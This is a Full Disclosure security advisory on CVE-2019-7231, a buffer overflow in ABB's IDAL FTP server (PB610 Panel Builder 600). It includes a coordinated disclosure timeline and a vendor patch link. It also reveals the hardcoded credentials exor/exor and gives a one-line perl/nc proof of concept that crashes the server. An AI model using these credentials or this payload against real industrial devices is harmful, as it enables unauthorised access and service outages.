[<prev] [next>] [day] [month] [year] [list]
Message-ID: <b31c35c8544b407fa5e5ca9e97d4bb59@darkmatter.ae>
Date: Thu, 20 Jun 2019 12:11:38 +0000
From: xen1thLabs <xen1thLabs@...kmatter.ae>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability
XL-19-007 - ABB IDAL FTP Server Buffer Overflow Vulnerability
========================================================================
Identifiers
-----------
XL-19-007
CVE-2019-7231
ABBVU-IAMF-1902010
CVSS Score
----------
6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Affected vendor
---------------
ABB (new.abb.com)
Credit
------
Eldar Marcussen - xen1thLabs - Software Labs
Vulnerability summary
---------------------
The IDAL FTP server is vulnerable to a buffer overflow where a large string is sent by an authenticated attacker that causes a buffer overflow. This overflow is handled, but terminates the process.
Technical details
-----------------
An authenticated attacker can send a FTP command string of 472 bytes or more to overflow a buffer causing an exception that terminates the server. An unauthenticated attacker can take advantage of the hardcoded or default credential pair exor/exor to become an authenticated attacker.
Proof of concept
----------------
```
perl -e 'print "USER exor\r\nPASS exor\r\n" . "A" x 472 . "\r\n";' | nc targetip 22
```
Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367
Solution
--------
Apply the patches and instructions from vendor:
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch
Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
13/06/2019 - ABB Updated advisory to include this vulnerability
17/06/2019 - xen1thLabs public disclosure
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists